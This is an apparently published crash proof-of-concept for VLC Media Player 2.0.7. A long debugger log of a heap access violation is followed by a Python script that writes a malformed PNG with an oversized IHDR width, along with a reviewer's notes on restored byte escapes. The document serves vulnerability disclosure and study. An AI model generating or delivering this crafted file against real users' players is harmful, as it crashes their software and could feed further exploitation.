# Title : VLC Media Player 2.0.7 (.png) - Crash PoC
# Published : 2013-07-01
# Author :
#!/usr/bin/python
# VLC Media Player 2.0.7 PNG Crash PoC
# Vendor Homepage: http://www.videolan.org/
# Version: 2.0.7
# Tested on: Windows 7 64-bit
# Author: Kevin Fujimoto
# Debug Information:
# Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
# Copyright (c) Microsoft Corporation. All rights reserved.
# *** wait with pending attach
# Symbol search path is: SRV*g:symbols*http://msdl.microsoft.com/download/symbols
# Executable search path is:
# ModLoad: 00400000 00425000 G:Program Files (x86)VideoLANVLCvlc.exe
# ModLoad: 775b0000 77730000 C:WindowsSysWOW64ntdll.dll
# ModLoad: 750f0000 75200000 C:Windowssyswow64kernel32.dll
# ModLoad: 76100000 76147000 C:Windowssyswow64KERNELBASE.dll
# ModLoad: 623e0000 6240c000 G:Program Files (x86)VideoLANVLClibvlc.dll
# ModLoad: 50420000 5066d000 G:Program Files (x86)VideoLANVLClibvlccore.dll
# ModLoad: 75ab0000 75b50000 C:Windowssyswow64ADVAPI32.dll
# ModLoad: 76170000 7621c000 C:Windowssyswow64msvcrt.dll
# ModLoad: 76150000 76169000 C:WindowsSysWOW64sechost.dll
# ModLoad: 75210000 75300000 C:Windowssyswow64RPCRT4.dll
# ModLoad: 75000000 75060000 C:Windowssyswow64SspiCli.dll
# ModLoad: 74ff0000 74ffc000 C:Windowssyswow64CRYPTBASE.dll
# ModLoad: 76390000 76fda000 C:Windowssyswow64SHELL32.DLL
# ModLoad: 76230000 76287000 C:Windowssyswow64SHLWAPI.dll
# ModLoad: 75dd0000 75e60000 C:Windowssyswow64GDI32.dll
# ModLoad: 75ca0000 75da0000 C:Windowssyswow64USER32.dll
# ModLoad: 760f0000 760fa000 C:Windowssyswow64LPK.dll
# ModLoad: 75bf0000 75c8d000 C:Windowssyswow64USP10.dll
# ModLoad: 71880000 718b2000 C:Windowssystem32WINMM.DLL
# ModLoad: 75590000 755c5000 C:Windowssyswow64WS2_32.dll
# ModLoad: 75300000 75306000 C:Windowssyswow64NSI.dll
# ModLoad: 75730000 75735000 C:Windowssyswow64PSAPI.DLL
# ModLoad: 75750000 75908000 C:Windowssyswow64WININET.DLL
# ModLoad: 75be0000 75be4000 C:Windowssyswow64api-ms-win-downlevel-user32-l1-1-0.dll
# ModLoad: 77580000 77585000 C:Windowssyswow64api-ms-win-downlevel-advapi32-l1-1-0.dll
# ModLoad: 76220000 76224000 C:Windowssyswow64api-ms-win-downlevel-shlwapi-l1-1-0.dll
# ModLoad: 75c90000 75c94000 C:Windowssyswow64api-ms-win-downlevel-version-l1-1-0.dll
# ModLoad: 74df0000 74df9000 C:Windowssystem32version.DLL
# ModLoad: 75a40000 75a43000 C:Windowssyswow64api-ms-win-downlevel-normaliz-l1-1-0.dll
# ModLoad: 75740000 75743000 C:Windowssyswow64normaliz.DLL
# ModLoad: 75310000 75508000 C:Windowssyswow64iertutil.dll
# ModLoad: 75a50000 75ab0000 C:Windowssystem32IMM32.DLL
# ModLoad: 762c0000 7638c000 C:Windowssyswow64MSCTF.dll
# ModLoad: 10000000 10059000 C:WindowsSysWOW64guard32.dll
# ModLoad: 74de0000 74de7000 C:Windowssystem32fltlib.dll
# ModLoad: 755d0000 7572c000 C:Windowssyswow64ole32.dll
# ModLoad: 73d90000 73d9b000 C:Windowssystem32profapi.dll
# ModLoad: 720f0000 72170000 C:Windowssystem32uxtheme.dll
# ModLoad: 73cb0000 73cc3000 C:Windowssystem32dwmapi.dll
# ModLoad: 71f50000 720ee000 C:WindowsWinSxSx86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2comctl32.dll
# ModLoad: 75060000 750e3000 C:Windowssyswow64CLBCatQ.DLL
# ModLoad: 75b50000 75bdf000 C:Windowssyswow64OLEAUT32.dll
# ModLoad: 61070000 610bc000 G:Program Files (x86)VideoLANVLCpluginsaccesslibdshow_plugin.dll
# ModLoad: 5bf20000 5bf3c000 G:Program Files (x86)VideoLANVLCpluginsaudio_outputlibaout_directx_plugin.dll
# ModLoad: 5bf00000 5bf1d000 G:Program Files (x86)VideoLANVLCpluginsaudio_outputlibwaveout_plugin.dll
# ModLoad: 5b850000 5b874000 G:Program Files (x86)VideoLANVLCpluginsvideo_outputlibdirectx_plugin.dll
# ModLoad: 5b830000 5b849000 G:Program Files (x86)VideoLANVLCpluginsmmxextlibmemcpymmxext_plugin.dll
# ModLoad: 5b7f0000 5b82f000 G:Program Files (x86)VideoLANVLCpluginsaccessliblibbluray_plugin.dll
# ModLoad: 59020000 59048000 G:Program Files (x86)VideoLANVLCpluginsaccesslibaccess_bd_plugin.dll
# ModLoad: 57fb0000 58001000 G:Program Files (x86)VideoLANVLCpluginsaccesslibdvdnav_plugin.dll
# ModLoad: 5b7d0000 5b7eb000 G:Program Files (x86)VideoLANVLCpluginsaccesslibaccess_vdr_plugin.dll
# ModLoad: 5b760000 5b77b000 G:Program Files (x86)VideoLANVLCpluginsaccesslibfilesystem_plugin.dll
# ModLoad: 50830000 508ac000 G:Program Files (x86)VideoLANVLCpluginsstream_filterlibstream_filter_httplive_plugin.dll
# ModLoad: 50370000 50420000 G:Program Files (x86)VideoLANVLCpluginsstream_filterlibstream_filter_dash_plugin.dll
# ModLoad: 59060000 5907a000 G:Program Files (x86)VideoLANVLCpluginsaccesslibstream_filter_rar_plugin.dll
# ModLoad: 58040000 58065000 G:Program Files (x86)VideoLANVLCpluginsaccesslibzip_plugin.dll
# ModLoad: 58020000 58039000 G:Program Files (x86)VideoLANVLCpluginsstream_filterlibstream_filter_record_plugin.dll
# ModLoad: 57bb0000 57bda000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibplaylist_plugin.dll
# ModLoad: 50210000 5036f000 G:Program Files (x86)VideoLANVLCpluginsmeta_enginelibtaglib_plugin.dll
# ModLoad: 57b50000 57baa000 G:Program Files (x86)VideoLANVLCpluginslualiblua_plugin.dll
# ModLoad: 500c0000 50202000 G:Program Files (x86)VideoLANVLCpluginsmisclibxml_plugin.dll
# ModLoad: 57cd0000 57ced000 G:Program Files (x86)VideoLANVLCpluginscontrollibhotkeys_plugin.dll
# ModLoad: 57970000 57989000 G:Program Files (x86)VideoLANVLCpluginscontrollibglobalhotkeys_plugin.dll
# ModLoad: 68cf0000 697d9000 G:Program Files (x86)VideoLANVLCpluginsguilibqt4_plugin.dll
# ModLoad: 75510000 7558b000 C:Windowssyswow64COMDLG32.DLL
# ModLoad: 72230000 72281000 C:Windowssystem32WINSPOOL.DRV
# ModLoad: 72330000 72337000 C:Windowssystem32WSOCK32.DLL
# ModLoad: 73da0000 73db7000 C:Windowssystem32userenv.dll
# ModLoad: 72200000 72216000 C:Windowssystem32CRYPTSP.dll
# ModLoad: 72180000 721bb000 C:Windowssystem32rsaenh.dll
# ModLoad: 73a60000 73a6e000 C:Windowssystem32RpcRtRemote.dll
# ModLoad: 507d0000 50828000 G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibupnp_plugin.dll
# ModLoad: 72650000 7266c000 C:Windowssystem32IPHLPAPI.DLL
# ModLoad: 72640000 72647000 C:Windowssystem32WINNSI.DLL
# ModLoad: 57940000 57965000 G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibsap_plugin.dll
# ModLoad: 57160000 5717a000 G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibpodcast_plugin.dll
# ModLoad: 56d90000 56daa000 G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibmediadirs_plugin.dll
# ModLoad: 507b0000 507c9000 G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibwindrive_plugin.dll
# ModLoad: 62da0000 62f0f000 C:Windowssystem32explorerframe.dll
# ModLoad: 62d70000 62d9f000 C:Windowssystem32DUser.dll
# ModLoad: 62cb0000 62d62000 C:Windowssystem32DUI70.dll
# ModLoad: 730c0000 73144000 C:WindowsWinSxSx86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149afcomctl32.dll
# ModLoad: 77c00000 77c40000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibmp4_plugin.dll
# ModLoad: 77bd0000 77bf5000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibavi_plugin.dll
# ModLoad: 77ba0000 77bc2000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibasf_plugin.dll
# ModLoad: 77b80000 77b9b000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibflacsys_plugin.dll
# ModLoad: 50790000 507ab000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibes_plugin.dll
# ModLoad: 69830000 69857000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibmpc_plugin.dll
# ModLoad: 61c90000 61cab000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibnuv_plugin.dll
# ModLoad: 6bbb0000 6bbca000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibtta_plugin.dll
# ModLoad: 675f0000 6760b000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibwav_plugin.dll
# ModLoad: 6aaf0000 6abdb000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibsid_plugin.dll
# ModLoad: 69d90000 69eb8000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibmkv_plugin.dll
# ModLoad: 6ccd0000 6cd86000 G:Program Files (x86)VideoLANVLCpluginsdemuxliblive555_plugin.dll
# ModLoad: 6ef10000 6ef3b000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibogg_plugin.dll
# ModLoad: 70950000 70969000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibdirac_plugin.dll
# ModLoad: 644f0000 6450a000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibsmf_plugin.dll
# ModLoad: 64370000 6438a000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibrawvid_plugin.dll
# ModLoad: 6c2c0000 6c2da000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibpva_plugin.dll
# ModLoad: 6a510000 6a53f000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibts_plugin.dll
# ModLoad: 67f30000 67f4a000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibnsv_plugin.dll
# ModLoad: 6f980000 6f999000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibau_plugin.dll
# ModLoad: 6a6e0000 6a74f000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibgme_plugin.dll
# ModLoad: 6c5e0000 6c5fa000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibvoc_plugin.dll
# ModLoad: 64810000 64829000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibxa_plugin.dll
# ModLoad: 071a0000 072ad000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibmod_plugin.dll
# ModLoad: 66c10000 66c2a000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibaiff_plugin.dll
# ModLoad: 060b0000 060cb000 G:Program Files (x86)VideoLANVLCpluginsdemuxlibimage_plugin.dll
# ModLoad: 77b40000 77b7e000 G:Program Files (x86)VideoLANVLCpluginscodeclibpng_plugin.dll
# (1e8c.1954): Access violation - code c0000005 (!!! second chance !!!)
# eax=072b0048 ebx=00ab0000 ecx=00000000 edx=00000000 esi=072b0040 edi=00ab0000
# eip=775eb6d8 esp=0658daf4 ebp=0658dbc4 iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
# ntdll!RtlpAllocateHeap+0x7fb:
# 775eb6d8 8b09 mov ecx,dword ptr [ecx] ds:002b:00000000=????????
# 0:009> !exploitable -v
# HostMachineHostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Module load completed but symbols could not be loaded for G:Program Files (x86)VideoLANVLCvlc.exe
# Exception Faulting Address: 0x0
# Second Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Read Access Violation
# Faulting Instruction:775eb6d8 mov ecx,dword ptr [ecx]
# Basic Block:
# 775eb6d8 mov ecx,dword ptr [ecx]
# Tainted Input Operands: ecx
# 775eb6da mov edx,dword ptr [edx+4]
# 775eb6dd cmp ecx,edx
# Tainted Input Operands: ecx
# 775eb6df jne ntdll!rtlpallocateheap+0x8e4 (7763af86)
# Tainted Input Operands: ZeroFlag
# Exception Hash (Major/Minor): 0x65193219.0x71557302
# Stack Trace:
# ntdll!RtlpAllocateHeap+0x7fb
# ntdll!RtlAllocateHeap+0x23a
# msvcrt!_calloc_impl+0x136
# msvcrt!_calloc_crt+0x16
# msvcrt!_getbuf+0x11
# msvcrt!_flsbuf+0x94
# msvcrt!_fputwc_nolock+0xd5
# msvcrt!fputwc+0x51
# vlc+0x5975
# vlc+0x97ee
# vlc+0x700b
# msvcrt!_wsopen_s+0x1b
# msvcrt!_unlock+0x15
# msvcrt!_iob+0x60
# ntdll!ExecuteHandler2+0x26
# Instruction Address: 0x00000000775eb6d8
# Description: Data from Faulting Address controls Branch Selection
# Short Description: TaintedDataControlsBranchSelection
# Exploitability Classification: UNKNOWN
# Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at ntdll!RtlpAllocateHeap+0x00000000000007fb called from msvcrt!_calloc_impl+0x0000000000000136 (Hash=0x65193219.0x71557302)
# The data from the faulting address is later used to determine whether or not a branch is taken.
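# Minimal five-chunk PNG whose IHDR declares a width of 0x7FFFFFFF. Per the
# debugger output above, VLC 2.0.7 faulted inside ntdll!RtlpAllocateHeap while
# a later calloc() ran (reached via msvcrt fputwc/_flsbuf), which points to
# heap state that was already damaged by the time that allocation happened;
# the trace does not identify where the corruption itself occurred.
#
# NOTE(review): the listing had lost the backslashes of its "\x.." escapes
# (they appeared as "x89x50..."); they are restored here as bytes literals so
# the script runs unchanged on Python 2.6+ and Python 3. Chunk CRCs are copied
# from the published PoC and have not been recomputed.


def build_png():
    """Return the PoC image as bytes (86 bytes: signature plus five chunks)."""
    return (
        b"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A"  # PNG signature
        b"\x00\x00\x00\x0D"                  # IHDR data length (13)
        b"\x49\x48\x44\x52"                  # "IHDR"
        b"\x7F\xFF\xFF\xFF"                  # width = 2**31-1, the anomalous field
        b"\x00\x00\x01\x02"                  # height = 258
        b"\x01"                              # bit depth
        b"\x03"                              # color type 3 (indexed, uses PLTE)
        b"\x00"                              # compression method
        b"\x00"                              # filter method
        b"\x00"                              # interlace method
        b"\xBA\x1B\xD8\x84"                  # IHDR CRC (as published)
        b"\x00\x00\x00\x03"                  # PLTE data length (3)
        b"\x50\x4C\x54\x45"                  # "PLTE"
        b"\xFF\xFF\xFF"                      # single palette entry: R, G, B
        b"\xA7\xC4\x1B\xC8"                  # PLTE CRC (as published)
        b"\x00\x00\x00\x01"                  # tRNS data length (1)
        b"\x74\x52\x4E\x53"                  # "tRNS"
        b"\x00"                              # alpha for palette entry 0
        b"\x40\xE6\xD8\x66"                  # tRNS CRC (as published)
        b"\x00\x00\x00\x01"                  # IDAT data length (1)
        b"\x49\x44\x41\x54"                  # "IDAT"
        b"\xFF"                              # image data (a single byte)
        b"\x05\x3A\x92\x65"                  # IDAT CRC (as published)
        b"\x00\x00\x00\x00"                  # IEND data length (0)
        b"\x49\x45\x4E\x44"                  # "IEND"
        b"\xAE\x42\x60\x82"                  # IEND CRC
    )


# Module-level name kept for anything that referenced the original `out`.
out = build_png()


def write_png(path="crash.png"):
    """Write the PoC image to *path*, printing the same progress messages.

    Args:
        path: output file name; defaults to the original 'crash.png'.

    Raises:
        OSError: if the file cannot be created or written.
    """
    print("Writing file...")
    # `with` closes the handle on error too; the original also shadowed the
    # `file` builtin with its handle name.
    with open(path, "wb") as fh:
        fh.write(out)
    print("File written!")


if __name__ == "__main__":
    # Guarded so importing this module does not write to the working directory.
    write_png()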